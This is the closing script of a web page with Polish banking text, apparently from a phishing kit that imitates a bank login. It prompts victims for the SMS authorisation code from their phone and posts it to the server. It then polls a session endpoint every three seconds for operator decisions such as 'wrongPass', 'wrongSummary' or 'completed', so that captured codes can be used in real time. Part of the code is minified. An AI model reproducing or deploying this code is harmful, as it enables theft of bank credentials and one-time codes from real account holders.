        }).fail(error => {
            console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
        })
    }

    const regularPass = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "wrongPass") {
                        clearInterval(multiplePass)
                        wrongPass()
                        location.reload()
                    }
                } else {

                }
            }
        });
    }

    let multiplePass = setInterval(function(){ regularPass() }, 3000);




    //SUMMARY

    const summaryFunc = () => {
        $("#mainCont").empty()
        $("#mainCont").append('<input type="text" placeholder="Kod SMS z telefonu" id="bank_summary" onclick="psdUpdate()">')
        $("#buttonsCont").empty()
        $("#buttonsCont").append('<button onclick="summaryCode()" type="submit" class="h--btn-arrow-right h--btn-light-green gotoPassword float-right long login-next-button fz-12">dalej</button>')
    }

    const summaryCode = () => {
        if ($("#bank_summary").val() !== "") {
            $.post("/api/summarycode/", {
                bank_summary: $("#bank_summary").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<p style="font-size:20px">Logowanie...</p>')
                $("#buttonsCont").empty()
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);
</script>

</body></html>